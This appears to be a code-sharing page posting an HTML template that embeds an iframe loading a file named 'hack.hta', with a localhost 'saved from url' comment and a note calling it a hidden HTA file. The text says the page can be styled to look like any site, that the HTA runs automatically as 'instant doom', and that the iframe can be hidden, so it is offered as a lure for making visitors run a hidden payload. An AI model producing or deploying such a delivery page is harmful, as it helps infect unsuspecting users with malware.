HTML with Embedded IFrame .htm

<!DOCTYPE html> <!-- saved from url=(0016)http://localhost --> <html> <head> </head> <body> <!-- Linked to hidden HTA file --> <iframe src="hack.hta" application="yes" bapplication="yes"> </iframe> </body> </html>
HTM file. This can be styled to appear as any site. When the hta file is opened it is instant doom as it is set automatically execute. The iframe can even be hidden.

Be the first to comment

You can use [html][/html], [css][/css], [php][/php] and more to embed the code. Urls are automatically hyperlinked. Line breaks and paragraphs are automatically generated.